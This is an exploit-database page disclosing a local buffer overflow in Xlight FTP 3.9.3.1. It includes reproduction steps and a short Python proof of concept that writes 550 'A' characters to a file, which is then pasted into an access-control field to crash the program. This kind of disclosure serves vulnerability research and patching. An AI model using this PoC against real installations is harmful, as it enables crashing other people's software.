Xlight FTP 3.9.3.1 Buffer Overflow

2021.11.14
Credit: Yehia Elghaly
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

# Exploit Title: Xlight FTP 3.9.3.1 - 'Buffer Overflow' (PoC) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-12 # Vendor Homepage: https://www.xlightftpd.com/ # Software Link: https://www.xlightftpd.com/download/setup.exe # Tested Version: 3.9.3.1 # Vulnerability Type: Buffer Overflow Local # Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: Xlight FTP 3.9.3.1 'Access Control List' Buffer Overflow (PoC) # Steps to reproduce: # 1. - Download and Xlight FTP # 2. - Run the python script and it will create exploit.txt file. # 3. - Open Xlight FTP 3.9.3.1 # 4. - "File and Directory - Access Control List - Setup - Added users list directories # 5. - Go to Specify file or directory name applied or Specify username applied to or Specify groupname applied # 6. - Go to Setup -> added -> Enter new Item - Paste the characters # 7 - Crashed #!/usr/bin/python exploit = 'A' * 550 try: file = open("exploit.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top